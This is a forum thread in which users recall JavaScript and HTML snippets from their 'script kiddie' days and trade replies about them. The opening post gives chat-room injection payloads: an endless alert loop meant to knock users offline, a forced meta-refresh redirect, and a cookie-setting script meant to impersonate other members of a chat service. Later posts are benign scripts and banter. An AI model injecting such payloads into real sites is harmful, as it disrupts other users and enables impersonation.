Thread: JavaScript Tricks

System_Overload

Post JavaScript Tricks

Back when I a little scripter kiddie. I made little java/html scripts to mess with people in html based chat rooms. Here are some of the scripts that I made.....

Punt Script:
    Code:
    <script language=javascript>var i=0; 
    while( i < (i +2)){i +=1; alert ('Enter text here' +i) }</script>
    This script punts a person offline...

Transport Script:
    Code:
    <meta http-equiv="refresh" 
    content=1;url="URL here"></meta>
    This script sends a the people in the chat room to an other web site...

Wondow Script:
    Code:
    <script>window.close("")</script>
    This script will close the window that your in...

Alert Script:
    Code:
    <script>window.alert("Message here")</script>
    This script will make a popup alert prompt...

Ghost Script:
    Code:
    <script>document.cookie="LAI=666";document.
    cookie="username="+prompt('username');ALERT('
    OKAY')</SCRIPT>
    This script I did not make... It was made for theglobe.com private rooms... It's a real cool code the will change you into any other globe member.... This script is one of the meny reasons why theglobe.com shut down......

If you made any cool javascript or html scripts back when you were a scripter kiddie feel free to post them on this thread....

System_0verload

Here is a date script

<script>
    var mydate=new Date()
    var year=mydate.getYear()
    if (year < 1000)
    year+=1900
    var day=mydate.getDay()
    var month=mydate.getMonth()
    var daym=mydate.getDate()
    if (daym<10)
    daym="0"+daym
    var dayarray=new Array("Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday")
    var montharray=new Array("January","February","March","April","May","June","July","August","September","October","November","December")
    document.write("<center><font color='orange' face='Verdana' size='2'>"+dayarray[day]+", "+montharray[month]+" "+daym+", "+year+"</font></center>")
    </script>

And here is a No right click one <--If you hold the left button and then right click it will get the source code. Some are a little more advanced.

<script>
    <!--

var message="This is an alert script";

function click(e) {
    if (document.all) {
    if (event.button == 2) {
    alert(message);
    return false;
    }
    }
    if (document.layers) {
    if (e.which == 3) {
    alert(message);
    return false;
    }
    }
    }
    if (document.layers) {
    document.captureEvents(Event.MOUSEDOWN);
    }
    document.onmousedown=click;
    // -->

</script>

hehe the all anoying -=freeOn=-

Eh ?

We need to know this why ?

If anyone one knows anything about JavaS then they will have resources ...but that goes onto my next point...? nah silly scripts, JavaS can do alot more then that...(good or bad like most things)

Hmmmm
    -Its a joke- eh ?

<script>
    insert false smile here
    </script>

JavaScript is cool, because I found a lot of similarities in it and C so it made it easy for me to learn C. For example, FOR...WHILE...IF...ELSE...etc are all identical

Damnit I just wanted to put some script up. Why do members always have to think they are the **** of AO. Javascript kicks ass but move onto big and better things.
    Why did a member have to post a comment that we didn't need to know or read?

freeOn

Tiz right eh, i buzz off javaS and have used alot in the past...

I just dont see any need for a post saying javaS tricks and then giving out lameo ones that can make zillions of pop ups come onto a browser....
    or window close...ect...(perhaps i read it wrong)

ahh its beneath me

These guys are sound as for java n stuff http://www.hotscripts.com/

System_Overload

Thumbs up

Yep thats a good site.....

System_0verload

My Encryption Script...

I made an encryption script... Uses ActiveX to save / load Unicode text files... This was my portal into encryption about a year or so ago... I used some personal fonts, so some of the text may appear weird...

Yes, I have moved on to bigger, and better stuff... I'm still working on some of it also. My current project is called "CMS Interface"... CMS means Computer Management System here... Basically, it is a console program that encrypts everything you do. It will look very much like MS-DOS (It's console!), but it will encrypt each user's files, info, etc... I had to start over because I couldn't reverse my file encryption/checking routine... I also learned a lot over the past month... Now I can make it better, and hopefully get it to work...

The zipped HTML file should be attached... I had to edit out (most of) the development information, and get rid of the 'beta features'... I really wanted to make this good...

-Tim_axe